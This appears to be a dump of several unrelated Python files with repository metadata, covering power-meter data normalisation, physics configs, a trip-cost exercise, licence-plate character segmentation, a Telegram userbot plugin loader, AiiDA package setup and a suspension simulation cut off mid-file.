def __init__(self):
self.time_date = 0
self.global_active_Ah_min = 0
self.global_reactive_Ah_min = 0
self.voltage = 0
self.current = 0
self.sub_meters = []
self.residual_active_energy = 0
self.error_active = 0
self.power = 0
self.raw_power = 0
def process_entry(self, arr):
ret = [self.__date_time_timestamp(arr[0], arr[1])]
if arr[2] == '?':
return False
# global active power in kilowatts to Amps to Ah
ret.append(self.__convert_watts_to_amps(float(arr[2]) * (1000 / 60), float(arr[4])))
# global reactive power in kilowatts to Amps to Ah
ret.append(self.__convert_watts_to_amps(float(arr[3]) * (1000 / 60), float(arr[4])))
# volts
ret.append(float(arr[4]))
# amps
ret.append(float(arr[5]))
# Sub meters from watt hours to Amp hours
ret.append(self.__convert_Wh_to_Ah(float(arr[6]), float(arr[4])))
ret.append(self.__convert_Wh_to_Ah(float(arr[7]), float(arr[4])))
ret.append(self.__convert_Wh_to_Ah(float(arr[8]), float(arr[4])))
# Active power in Ah not measured by the sub meters
ret.append((ret[1]) - (ret[5] + ret[6] + ret[7]))
# Power in Ah difference between volts * current and global active power
# (volts * amps) - global active kilowatts * 1000
# / volts
ret.append(self.__convert_watts_to_amps((float(arr[4]) * float(arr[5])) - (float(arr[2]) * 1000), float(arr[4])))
ret.append(float(arr[4]) * float(arr[5]))
return ret
def __calc_phase_from_real(self):
self.__convert_amps_to_watts(self.global_active_Ah_min, self.voltage)
def process_record(self, rec, ranges):
# self.time_date = self.__date_time_vector(rec[0], ranges[0])
self.time_date = rec[0]
self.global_active_Ah_min = self.__global_active_Ah_vector(rec[1], ranges[1])
self.global_reactive_Ah_min = self.__global_reactive_Ah_vector(rec[2], ranges[2])
self.voltage = self.__voltage_vector(rec[3], ranges[3])
self.current = self.__current_vector(rec[4], ranges[4])
self.sub_meters = self.__sub_meter_vector([rec[5], rec[6], rec[7]], [ranges[5], ranges[6], ranges[7]])
self.residual_active_energy = self.__residual_active_energy_vector(rec[8], ranges[8])
self.error_active = self.__error_active_vector(rec[9], ranges[9])
self.power = self.__power_vector(rec[10], ranges[10])
self.raw_power = rec[10]
def __date_time_timestamp(self, date, time):
date = date.split("/")
date = dt.date(int(date[2]), int(date[1]), int(date[0])).isoformat()
date = dt.datetime.fromisoformat("{}T{}".format(date, time))
return date.timestamp() # 100,000 records processed in 0.4 seconds
def __date_time_vector(self, val, time_date_range):
if time_date_range[0] > val or val > time_date_range[2]:
raise Exception("Value out of range")
val = (val - time_date_range[0]) / (time_date_range[2] - time_date_range[0])
return abs(val)
def __global_active_Ah_vector(self, val, global_active_Ah_min_range):
if global_active_Ah_min_range[0] > val or val > global_active_Ah_min_range[2]:
raise Exception("Value out of range")
val = (val - global_active_Ah_min_range[0]) / (global_active_Ah_min_range[2] - global_active_Ah_min_range[0])
return abs(val)
def __global_reactive_Ah_vector(self, val, global_reactive_Ah_min_range):
if global_reactive_Ah_min_range[0] > val or val > global_reactive_Ah_min_range[2]:
raise Exception("Value out of range")
val = (val - global_reactive_Ah_min_range[0]) / (global_reactive_Ah_min_range[2] - global_reactive_Ah_min_range[0])
return abs(val)
def __voltage_vector(self, val, voltage_range):
if voltage_range[0] > val or val > voltage_range[2]:
raise Exception("Value out of range")
val = (val - voltage_range[0]) / (voltage_range[2] - voltage_range[0])
return abs(val)
def __current_vector(self, val, current_range):
if current_range[0] > val or val > current_range[2]:
raise Exception("Value out of range")
val = (val - current_range[0]) / (current_range[2] - current_range[0])
return abs(val)
def __sub_meter_vector(self, vals, sub_meters_range):
if sub_meters_range[0][0] > vals[0] or vals[0] > sub_meters_range[0][2]:
raise Exception("Value out of range")
vals[0] = (vals[0] - sub_meters_range[0][0]) / (sub_meters_range[0][2] - sub_meters_range[0][0])
if sub_meters_range[1][0] > vals[1] or vals[1] > sub_meters_range[1][2]:
raise Exception("Value out of range")
vals[1] = (vals[1] - sub_meters_range[1][0]) / (sub_meters_range[1][2] - sub_meters_range[1][0])
if sub_meters_range[2][0] > vals[2] or vals[2] > sub_meters_range[2][2]:
raise Exception("Value out of range")
vals[2] = (vals[2] - sub_meters_range[2][0]) / (sub_meters_range[2][2] - sub_meters_range[2][0])
return vals
def __residual_active_energy_vector(self, val, residual_active_energy_range):
if residual_active_energy_range[0] > val or val > residual_active_energy_range[2]:
raise Exception("Value out of range")
val = (val - residual_active_energy_range[0]) / (residual_active_energy_range[2] - residual_active_energy_range[0])
return abs(val)
def __error_active_vector(self, val, error_active_range):
if error_active_range[0] > val or val > error_active_range[2]:
raise Exception("Value out of range")
val = (val - error_active_range[0]) / (error_active_range[2] - error_active_range[0])
return abs(val)
def __power_vector(self, val, power_range):
if power_range[0] > val or val > power_range[2]:
raise Exception("Value out of range")
val = (val - power_range[0]) / (power_range[2] - power_range[0])
return abs(val)
def __convert_watts_to_amps(self, watts, volts):
return watts / volts
def __convert_amps_to_watts(self, amps, volts):
return amps * volts
def __convert_Wh_to_Ah(self, wh, volts):
return wh / volts
| 43.854305
| 123
| 0.643914
| 6,361
| 0.960586
| 0
| 0
| 0
| 0
| 0
| 0
| 669
| 0.101027
|
8ba7da6d41b49d8a498bec0f19c0c437b815e955
| 558
|
py
|
Python
|
RecoTracker/CkfPattern/python/CkfTrackCandidatesNoOverlaps_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
RecoTracker/CkfPattern/python/CkfTrackCandidatesNoOverlaps_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
RecoTracker/CkfPattern/python/CkfTrackCandidatesNoOverlaps_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
# TrackerTrajectoryBuilders
from RecoTracker.CkfPattern.CkfTrajectoryBuilder_cff import *
# TrajectoryCleaning
from TrackingTools.TrajectoryCleaning.TrajectoryCleanerBySharedHits_cfi import *
# navigation school
from RecoTracker.TkNavigation.NavigationSchoolESProducer_cff import *
from RecoTracker.CkfPattern.CkfTrackCandidates_cfi import *
# generate CTF track candidates ############
ckfTrackCandidatesNoOverlaps = ckfTrackCandidates.clone(
TrajectoryBuilderPSet = dict(refToPSet_ = 'CkfTrajectoryBuilder')
)
| 39.857143
| 80
| 0.844086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 132
| 0.236559
|
8ba816e0011648c0f031c8c0072d0e07ef644345
| 3,639
|
py
|
Python
|
python ex12.py
|
IMDCGP105-1819/portfolio-s184286
|
e5485f640f341090823bbcaabe287376a048b2c4
|
[
"MIT"
] | null | null | null |
python ex12.py
|
IMDCGP105-1819/portfolio-s184286
|
e5485f640f341090823bbcaabe287376a048b2c4
|
[
"MIT"
] | null | null | null |
python ex12.py
|
IMDCGP105-1819/portfolio-s184286
|
e5485f640f341090823bbcaabe287376a048b2c4
|
[
"MIT"
] | null | null | null |
"""
Task 3
Write an application that allows you to calculate the cost of a trip.
Implement a function called hotel_cost that takes one argument, nights, as input. The hotel costs
£70 per night – so return a suitable value.
Implement a function called plane_ticket_cost that accepts a string, city, and a float, class, as inputs.
The function should handle the following locations, returning their associated round trip costs that
are multiplied by the class amount.
“New York”: £2,000
“Auckland”: £790
“Venice”: £154
“Glasgow”: £65
The class multiplier starts at 1 for economy and goes up in .3 steps: 1.3 = premium economy, 1.6 =
business class and 1.9 = first class.
Then implement the rental_car_cost function with an argument called days. The function should
calculate the cost of hiring a car with the following considerations:
•Every day of car hire costs £30
•If you rent the car for more than 7 days, you get £50 off your total
•If you rent the car for more than 3 days, you get £30 off your total
oThese two discounts cannot be applied at the same time.
Define a function total_cost which accepts two arguments; city and days. It should call the other
functions and return the sum of the cost of the trip.
Save the file as the next numeric ex value and commit to GitHub.
"""
nights = int(input("how many number of nights stay?"))
def hotel_cost(nights):
nights*70
print("number of nights",nights)
hotel_cost(nights)
city=str(input("select your destination: New york, Auckland, Venice, Glasgow: "))
def plane_ticket_cost(city, _class): # the function should handle the following locations, returning thier associated round trip costs that are multiplied by the class amount.
if city=='New york':
plane_ticket_cost = 2000.00
elif city=='Auckland':
plane_ticket_cost = 790.00
elif city=='Venice':
plane_ticket_cost = 154.00
elif city=='Glasgow':
plane_ticket_cost = 65.00
# the class multiplier starts at 1 for economy and goes up in 3 steps: 1.3 premium economy 1.6 = business class and 1.9 = first class.
_class=float(input("Select your Travel Class: 1=Economy, 1.3=Premium Economy, 1.6=Business Class, 1.9=First Class: "))
if _class=='1':
print("Economy Travel Class selected")
elif _class=='1.3':
print("Premium Economy Travel Class selected")
elif _class=='1.6':
print("Business Class Travel Class selected")
elif _class=='1.9':
print("First Class Travel Class selected")
plane_ticket_cost(city, _class)
days=float(input("enter how many number of days car hire required: "))
def rental_car_cost(days): # Every day of car hire costs £30
if days > 0:
print(days * 30)
elif days > 3:
print(days * 30 -30.00) # If you rent the car for more than 3 days, you get £30 off your total
elif days > 7:
print (days * 30 -50.00) # If you rent the car for more than 7 days, you get £50 off your total
# These two discounts cannot be applied at the same time.
rental_car_cost(days)
def total_cost(city,days): # accepts two arguments, city and days.
# it should call the other functions and return the sum of the cost of the trip.
print("the Hotel Cost is:", hotel_cost(nights))
print("the Plane Ticket Cost: ", plane_ticket_cost(city, _class))
print(" Rental Car Cost:", rental_car_cost(days) )
print("Choice of city:", city)
print("for ",days, "no of Days")
print("Travelling in", _class, )
total_cost(city,days)
| 34.657143
| 183
| 0.687826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,575
| 0.700871
|
8ba86635b84461a1f0a395b2d0b3f48cfc499bf5
| 7,050
|
py
|
Python
|
segment_chars.py
|
indranildchandra/Automatic-Licence-Plate-Recognizer
|
12abcf40459f8e2d5d7491aedaed2ee3ea1eb1a7
|
[
"Apache-2.0"
] | 1
|
2020-10-12T12:49:05.000Z
|
2020-10-12T12:49:05.000Z
|
segment_chars.py
|
indranildchandra/Automatic-Licence-Plate-Recognizer
|
12abcf40459f8e2d5d7491aedaed2ee3ea1eb1a7
|
[
"Apache-2.0"
] | null | null | null |
segment_chars.py
|
indranildchandra/Automatic-Licence-Plate-Recognizer
|
12abcf40459f8e2d5d7491aedaed2ee3ea1eb1a7
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
import numpy as np
import cv2
import os
import math
import pickle
from matplotlib import pyplot as plt
from PIL import Image
from matplotlib.pyplot import imshow
# %matplotlib inline
def rotate_image(img):
# gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
gray = img
edges = cv2.Canny(gray,50,150,apertureSize = 3)
lines = cv2.HoughLines(edges,1,np.pi/180,200)
angle = 0
if lines is not None:
for rho,theta in lines[0]:
angle = math.degrees(theta)-90
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
# print(angle)
# Do skew correction only if the angle of rotation is greather than 3 degrees
if abs(angle%90) > 3:
if angle < 0:
angle = -1* angle
if angle > 45:
angle = 90-angle
(h, w) = img.shape[:2]
center = (w // 2, h // 2)
M = cv2.getRotationMatrix2D(center, angle, 1.0)
rotated = cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)
# cv2.putText(rotated, "Angle: {:.2f} degrees".format(angle), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
# print("Image rotated by angle: {:.3f}".format(angle))
return rotated
else:
return img
def square(img):
"""
This function resize non square image to square one (height == width)
:param img: input image as numpy array
:return: numpy array
"""
# image after making height equal to width
squared_image = img
# Get image height and width
h = img.shape[0]
w = img.shape[1]
# In case height superior than width
if h > w:
diff = h-w
if diff % 2 == 0:
x1 = np.zeros(shape=(h, diff//2))
x2 = x1
else:
x1 = np.zeros(shape=(h, diff//2))
x2 = np.zeros(shape=(h, (diff//2)+1))
squared_image = np.concatenate((x1, img, x2), axis=1)
# In case height inferior than width
if h < w:
diff = w-h
if diff % 2 == 0:
x1 = np.zeros(shape=(diff//2, w))
x2 = x1
else:
x1 = np.zeros(shape=(diff//2, w))
x2 = np.zeros(shape=((diff//2)+1, w))
squared_image = np.concatenate((x1, img, x2), axis=0)
return squared_image
def get_segmented_chars(img_file_path, annotation):
img = cv2.imread(img_file_path)
# imshow(img)
img = img[round(img.shape[0]*0.1):round(img.shape[0]*0.9), round(img.shape[1]*0.1):round(img.shape[1]*0.9)]
# imshow(img)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# imshow(imgray)
imgray = rotate_image(imgray)
# imshow(imgray)
kernel = np.ones((8,8), np.uint8)
eroded_img = cv2.erode(imgray, kernel, iterations=1)
# imshow(eroded_img)
imgray = eroded_img
height = img.shape[0]
width = img.shape[1]
area = height * width
scale1 = 0.001 # static value
scale2 = 0.1 # static value
area_condition1 = area * scale1
area_condition2 = area * scale2
# # Global Thresholding
# ret1,th1 = cv2.threshold(imgray,127,255,cv2.THRESH_BINARY)
# # Otsu's Thresholding
# ret2,th2 = cv2.threshold(imgray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# # Adaptive Mean Thresholding
# th4 = cv2.adaptiveThreshold(imgray,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,11,2)
# # Adaptive Gaussian Thresholding
# th5 = cv2.adaptiveThreshold(imgray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,11,2)
# Otsu's thresholding after Gaussian filtering
blur = cv2.GaussianBlur(imgray,(5,5),0)
ret3,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# titles = ['Original Grayscale Image', 'Global Thresholding', 'Otsu thresholding', 'Otsu thresholding after Gaussian filtering',
# 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']
# images = [imgray, th1, th2, th3, th4, th5]
# for i in range(6):
# plt.subplot(3,2,i+1),plt.imshow(images[i],'gray')
# plt.title(titles[i])
# plt.xticks([]),plt.yticks([])
# plt.show()
# get contours
contours, hierarchy = cv2.findContours(th3, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# sort contours
contours = sorted(contours, key=cv2.contourArea, reverse=True)
# filter contours
final_contours = []
aspect_ratio_filtered_contours = []
aspect_ratio_filtered_contours_area = []
area_filtered_contours = []
area_filtered_contours_centroids = []
for cnt in contours:
(x,y,w,h) = cv2.boundingRect(cnt)
if (w * h > area_condition1 and w * h < area_condition2 and (w/h > 0.3 or h/w > 0.3)):
aspect_ratio_filtered_contours.append(cnt)
aspect_ratio_filtered_contours_area.append(w * h)
if aspect_ratio_filtered_contours_area:
max_cnt_area = max(aspect_ratio_filtered_contours_area)
counter = 1
for cnt, cnt_area in zip(aspect_ratio_filtered_contours, aspect_ratio_filtered_contours_area):
if cnt_area >= 0.3 * max_cnt_area:
area_filtered_contours.append(cnt)
cnt_moment = cv2.moments(cnt)
area_filtered_contours_centroids.append((counter, int(cnt_moment['m10']/cnt_moment['m00']), int(cnt_moment['m01']/cnt_moment['m00'])))
counter += 1
if len(area_filtered_contours) > len(annotation):
area_filtered_contours_centroids.sort(key = lambda x: x[2], reverse=True)
# print(area_filtered_contours_centroids)
centroid_means = [sum(ele) / len(area_filtered_contours_centroids) for ele in zip(*area_filtered_contours_centroids)]
# print(centroid_means)
centroid_mean_distance = list()
for ele in area_filtered_contours_centroids:
centroid_mean_distance.append((ele[0], ele[1], ele[2], abs(math.sqrt((ele[1] - centroid_means[1])**2 + (ele[2] - centroid_means[2])**2))))
centroid_mean_distance.sort(key = lambda x: x[3], reverse=False)
# print(centroid_mean_distance)
counter = 1
for cnt, cnt_centroid_mean_dist in zip(area_filtered_contours, centroid_mean_distance):
if counter <= 7:
final_contours.append(cnt)
counter += 1
else:
break
else:
final_contours = area_filtered_contours
# final_contours = area_filtered_contours
cropped_chars = []
bounding_boxes = []
for cnt in final_contours:
(x,y,w,h) = cv2.boundingRect(cnt)
cv2.drawContours(img, [cnt], 0, (0, 255, 0), 3)
cv2.rectangle(img, (x,y), (x+w,y+h), (255, 0, 0), 2)
c = th3[y:y+h,x:x+w]
c = np.array(c)
c = cv2.bitwise_not(c)
c = square(c)
c = cv2.resize(c,(28,28), interpolation = cv2.INTER_AREA)
cropped_chars.append(c)
bounding_boxes.append((x,y,w,h))
# sort shortlisted contours from left to right
if cropped_chars:
a = list(map(tuple, zip(cropped_chars, final_contours, bounding_boxes)))
sorted_cropped_chars, sorted_final_contours, sorted_bounding_boxes = zip(*sorted(a, key = lambda x: x[2][0], reverse=False))
else:
sorted_cropped_chars = []
sorted_final_contours = []
sorted_bounding_boxes = []
# fig, axes = plt.subplots(3, 3, sharex=True, sharey=True)
# for cropped_char, ax in zip(sorted_cropped_chars, axes.flat):
# ax.imshow(cropped_char)
# ax.axis('off')
for index, cnt in enumerate(sorted_final_contours):
(x,y,w,h) = cv2.boundingRect(cnt)
img = cv2.putText(img, str(annotation[index]).upper(), (x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 1, (50,50,50), 2) # green - (36,255,12)
return sorted_cropped_chars, img
| 31.61435
| 141
| 0.699433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,016
| 0.285957
|
8ba8b01b1342226dbfd45e390f34ba1e3c088e34
| 123
|
py
|
Python
|
clase1/multiplicadores.py
|
Munoz-Rojas-Adriana/Computacion_para_Ingenieria
|
4f695887966a94b6c422d100c2c4ec4a94d1e80e
|
[
"Apache-2.0"
] | null | null | null |
clase1/multiplicadores.py
|
Munoz-Rojas-Adriana/Computacion_para_Ingenieria
|
4f695887966a94b6c422d100c2c4ec4a94d1e80e
|
[
"Apache-2.0"
] | null | null | null |
clase1/multiplicadores.py
|
Munoz-Rojas-Adriana/Computacion_para_Ingenieria
|
4f695887966a94b6c422d100c2c4ec4a94d1e80e
|
[
"Apache-2.0"
] | null | null | null |
multi = 0
list = (1 , 2 , 3)
for i in list:
multi = multi + i
print (f'la multi total de 1 al 3 es {multi}')
| 15.375
| 50
| 0.528455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.308943
|
8ba8ed599cf94b78021c68a977f2d000df6dcd16
| 2,476
|
py
|
Python
|
aiida_jutools/__init__.py
|
PhilippRue/aiida-jutools
|
66070e7077cb454bcfd70dd3327b335499556a16
|
[
"MIT"
] | 5
|
2020-12-11T13:32:09.000Z
|
2022-01-19T08:36:40.000Z
|
aiida_jutools/__init__.py
|
PhilippRue/aiida-jutools
|
66070e7077cb454bcfd70dd3327b335499556a16
|
[
"MIT"
] | 7
|
2021-01-28T10:24:13.000Z
|
2021-08-18T13:42:47.000Z
|
aiida_jutools/__init__.py
|
PhilippRue/aiida-jutools
|
66070e7077cb454bcfd70dd3327b335499556a16
|
[
"MIT"
] | 5
|
2020-12-07T17:13:38.000Z
|
2021-11-25T09:58:48.000Z
|
# -*- coding: utf-8 -*-
# pylint: disable=unused-import
###############################################################################
# Copyright (c), Forschungszentrum Jülich GmbH, IAS-1/PGI-1, Germany. #
# All rights reserved. #
# This file is part of the aiida-jutools package. #
# (AiiDA JuDFT tools) #
# #
# The code is hosted on GitHub at https://github.com/judftteam/aiida-jutools. #
# For further information on the license, see the LICENSE.txt file. #
# For further information please visit http://judft.de/. #
# #
###############################################################################
"""AiiDA JuTools.
We recommended to use this library with the import statement ``import aiida_jutools as jutools``. In your code,
you can then call all available tools like so: ``jutools.package.tool()``.
"""
__version__ = "0.1.0-dev1"
# Import all of the library's user packages.
from . import code
from . import computer
from . import group
from . import io
from . import logging
from . import meta
from . import node
from . import plugins
from . import process
from . import process_functions
from . import submit
from . import structure
# # import all of the library's developer packages.
from . import _dev
# Potentially problematic imports:
# - kkr: As soon as aiida-kkr becomes dependent on aiida-jutools, this import MIGHT introduce a circular
# dependencies. A simple test (made aiida-kkr import aiida-jutools) had no such effect. But if it
# occurs, here a few potential solutions:
# - Decouple the kkr package = remove from import list above. Then all code using it must be updated
# to import it separately, like from aiida_jutools import kkr as _jutools_kkr. Might break external code.
# - Hide all aiida-kkr imports = in resp. module, move them inside the tools that use them. If it works,
# this might be a solution that does not break external code.
#
# The potential problem and the solution stated above, if it becomes one, applies to other JuDFTTeam plugins as well,
# should they start using aiida-jutools as common codebase (aiida-fleur, aiida-spirit, aiida-spex, ...).
| 51.583333
| 117
| 0.586026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,154
| 0.8696
|
8bab05cccc2b06bc0e17af38af464fd773e79545
| 5,358
|
py
|
Python
|
beastx/__main__.py
|
Mrunal1911/Beast-X
|
b7b13b3b5db754894a830569909c4b77aa1ff19d
|
[
"MIT"
] | null | null | null |
beastx/__main__.py
|
Mrunal1911/Beast-X
|
b7b13b3b5db754894a830569909c4b77aa1ff19d
|
[
"MIT"
] | null | null | null |
beastx/__main__.py
|
Mrunal1911/Beast-X
|
b7b13b3b5db754894a830569909c4b77aa1ff19d
|
[
"MIT"
] | null | null | null |
import logging
from pathlib import Path
from sys import argv
import var
import telethon.utils
from telethon import TelegramClient
from telethon import events,Button
import os
from var import Var
from . import beast
from telethon.tl import functions
from beastx.Configs import Config
from telethon.tl.functions.messages import AddChatUserRequest
from telethon.tl.functions.users import GetFullUserRequest
from telethon.tl.functions.channels import LeaveChannelRequest
from telethon.tl.functions.account import UpdateProfileRequest
from telethon.tl.types import InputMessagesFilterDocument
from resources.startup.sanskar import autobot,autopilot,customize
from beastx.utils import load_module, start_assistant
import asyncio
from telethon.tl.functions.channels import InviteToChannelRequest
from . import bot
bot = beast
sed = logging.getLogger("beastx")
#rom . import semxx,semxxx
#####################################
plugin_channel = "@BeastX_Plugins"
#####################################
if Var.TG_BOT_TOKEN_BF_HER is None:
try:
print("BOT_TOKEN not Found")
bot.loop.run_until_complete(autobot())
except BaseException as er:
print(er)
else:
pass
sur = Config.PRIVATE_GROUP_ID
UL = Config.TG_BOT_USER_NAME_BF_HER
VR = "Beast 0.1"
chat_id = sur
sed = logging.getLogger("beastx")
async def add_bot(bot_token):
await bot.start(bot_token)
bot.me = await bot.get_me()
bot.uid = telethon.utils.get_peer_id(bot.me)
#om = await beast.get_me()
#mm = await sedmrunal.get_me()
#try:
#MSG = f"""
#✨𝔹𝕖𝕒𝕤𝕥 ℍ𝕒𝕤 𝔹𝕖𝕖𝕟 𝔻𝕖𝕡𝕝𝕠𝕪𝕖𝕕!
#---------------------
#┏━━━━━━━━━━━━━━━━━
#┣•Assistant➠ @{mm.username}
#┣•User➠ @{om.username}
#┣•Version➠ {VR}
#┗━━━━━━━━━━━━━━━━━
#Do `.ping `or` /alive` for check userbot working
#"""
'''
await sedmrunal.send_message(sur, MSG,
buttons=[
[Button.url("⭐Updates", url="https://t.me/BeastX_Userbot")],
[ Button.url("⚡Support",url="https://t.me/BeastX_Support")]
])
except Exception as e:
sed.info(str(e))
sed.info("---------------------------------------")
sed.info("Bruh you forgot add assistant in log group")
sed.info("---------------------------------------")
'''
try:
bot.tgbot = None
if Var.TG_BOT_USER_NAME_BF_HER is not None:
bot.tgbot = TelegramClient(
"TG_BOT_TOKEN", api_id=Var.APP_ID, api_hash=Var.API_HASH
).start(bot_token=Var.TG_BOT_TOKEN_BF_HER)
bot.loop.run_until_complete(add_bot(Var.TG_BOT_USER_NAME_BF_HER))
else:
bot.start()
except BaseException as er:
sed.info(er)
async def a():
sed.info("Connecting...") ;
o = ""
la = 0
try:
await bot.start() ; sed.info("beastx connected") ; o = "client"
except:
sed.info("Telegram String Session Wrong or Expired Please Add new one ") ; quit(1)
import glob
async def a():
documentss = await bot.get_messages(plugin_channel, None , filter=InputMessagesFilterDocument)
total = int(documentss.total)
total_doxx = range(0, total)
for ixo in total_doxx:
mxo = documentss[ixo].id
downloaded_file_name = await bot.download_media(await bot.get_messages(plugin_channel, ids=mxo), "beastx/modules/")
if "(" not in downloaded_file_name:
path1 = Path(downloaded_file_name)
shortname = path1.stem
load_module(shortname.replace(".py", ""))
sed.info("Installed Plugin `{}` successfully.".format(os.path.basename(downloaded_file_name)))
else:
sed.info("Plugin `{}` has been pre-installed and cannot be installed.".format(os.path.basename(downloaded_file_name)))
logger_group = Var.PRIVATE_GROUP_ID
if not str(logger_group).startswith("-100"):
try:
bot.loop.run_until_complete(autopilot())
except BaseException as er:
print(er)
else:
pass
bot.loop.run_until_complete(a())
path = "beastx/modules/*.py"
files = glob.glob(path)
for name in files:
with open(name) as f:
path1 = Path(f.name)
shortname = path1.stem
load_module(shortname.replace(".py", ""))
if Config.ENABLE_ASSISTANTBOT == "ENABLE":
path = "beastx/modules/assistant/*.py"
files = glob.glob(path)
for name in files:
with open(name) as f:
path1 = Path(f.name)
shortname = path1.stem
start_assistant(shortname.replace(".py", ""))
sed.info("beastx And Assistant Bot Have Been Installed Successfully !")
sed.info("---------------------------------------")
sed.info("------------@BeastX_Userbot------------")
sed.info("---------------------------------------")
else:
sed.info("beastx Has Been Installed Sucessfully !")
sed.info("Hope you will enjoy")
#await bot.send_message(chat_id,MSG)
#else:
# sed.info("your Get_Msg disable")
bot.run_until_disconnected()
| 28.652406
| 140
| 0.58044
| 0
| 0
| 0
| 0
| 0
| 0
| 1,427
| 0.258843
| 1,848
| 0.335208
|
8bac89c0e7fe595c62cbe29b2411dd910e49d2c2
| 859
|
py
|
Python
|
tests/day02/test_day02.py
|
SebastiaanZ/aoc-2019
|
e1fe4630b0f375be0b79398e07e23b9c0196efbb
|
[
"MIT"
] | 3
|
2019-12-02T19:38:14.000Z
|
2020-01-28T00:06:09.000Z
|
tests/day02/test_day02.py
|
SebastiaanZ/aoc-2019
|
e1fe4630b0f375be0b79398e07e23b9c0196efbb
|
[
"MIT"
] | 6
|
2020-03-24T17:58:40.000Z
|
2022-03-12T00:18:45.000Z
|
tests/day02/test_day02.py
|
SebastiaanZ/aoc-2019
|
e1fe4630b0f375be0b79398e07e23b9c0196efbb
|
[
"MIT"
] | null | null | null |
import unittest
from solutions.day02.solution import ship_computer
from tests.helpers import Puzzle
class DayTwoTests(unittest.TestCase):
"""Tests for my solutions to Day 1 of the Advent of Code 2019."""
def test_ship_computer_with_example_data(self):
"""Test the ship computer used for day 2 using the example data provided in the puzzle."""
test_cases = (
Puzzle(data=[1, 9, 10, 3, 2, 3, 11, 0, 99, 30, 40, 50], answer=3500),
)
for puzzle in test_cases:
with self.subTest(data=puzzle.data, answer=puzzle.answer):
# We don't have a noun or verb, so fake it by supplying the values already in place
noun = puzzle.data[1]
verb = puzzle.data[2]
self.assertEqual(ship_computer(puzzle.data, noun=noun, verb=verb), puzzle.answer)
| 37.347826
| 99
| 0.641444
| 755
| 0.878929
| 0
| 0
| 0
| 0
| 0
| 0
| 238
| 0.277066
|
8bacb9d61c16b4122f25721e214182358d00a686
| 24,678
|
py
|
Python
|
ActiveSuspensions/2DOF Fuzzy Suspension.py
|
MarcoFerrari128/Portfolio
|
82cd81a4235dbd804cd13100b2304a04ca6771b5
|
[
"MIT"
] | null | null | null |
ActiveSuspensions/2DOF Fuzzy Suspension.py
|
MarcoFerrari128/Portfolio
|
82cd81a4235dbd804cd13100b2304a04ca6771b5
|
[
"MIT"
] | null | null | null |
ActiveSuspensions/2DOF Fuzzy Suspension.py
|
MarcoFerrari128/Portfolio
|
82cd81a4235dbd804cd13100b2304a04ca6771b5
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import ode
import FLC
import pyprind
from numpy.linalg import eig
import pandas as pd
def impulse(lenght):
i = 0
Impulse = []
while i < lenght:
if i == 99:
Impulse.append(1)
else:
Impulse.append(0)
i += 1
return 0.1 * np.array(Impulse)
def bump():
i = 0
Bump = []
while i < 1:
if i <= 0.5625 and i >= 0.5:
Bump.append(0.05 * (1 - np.cos(32 * np.pi * i)))
else:
Bump.append(0)
i += 0.001
return np.array(Bump)
def step(lenght):
i = 0
Step = []
while i < lenght:
if i <= 500:
Step.append(0)
else:
Step.append(1)
i += 1
return 0.1 * np.array(Step)
def rough2(lenght):
"""Random road condition.
Every 10 time sample a new random value is given. This simulates a car
moving on a road at 36 km/h with roughness wide 1 cm.
"""
i = 0
Rough = []
while i < lenght/10:
j = 0
sample = np.random.randn() # setting correct max height
while j < 10: # add the same value for 10 time steps
Rough.append(sample)
j += 1
i += 1
return 0.1 * np.array(Rough) / np.max(Rough) / 2
def rough3(lenght):
"""Road condition defined by the ISO 8608 standard"""
k = 3 # ISO road condition
N = lenght + 1 # data points
L = 10 # lenght of road profile
B = L / N # sampling interval
n0 = 0.1
dn = 1 / L # Frequency band
n = np.arange(dn, N*dn, dn) # frequency band
phi = 2 * np.pi * (np.random.rand(len(n)))
Amp1 = np.sqrt(dn) * (2**k) * (1e-3) * n0/n
x = np.arange(0, L-B, B)
hx = np.zeros(len(x))
for i in np.arange(len(x)):
hx[i] = np.sum(Amp1 * np.cos(2 * np.pi * n * x[i] + phi))
return 0.1 * hx / np.max(hx)
def rough():
"""Reading values from file Rough.txt"""
f = open('Rough.txt','r')
RoughList = []
for line in f:
RoughList.append(float(line))
return np.array(RoughList)
def RMS(array):
"""Calculates the root-mean-squared value of an array.
"""
return np.sqrt(array @ array / array.size)
def derivate(array, step=100):
"""Calculates the first order derivative of an array. It differs from
np.diff because this returns an array of the same lenght as the input one.
It becomes useful for plotting.
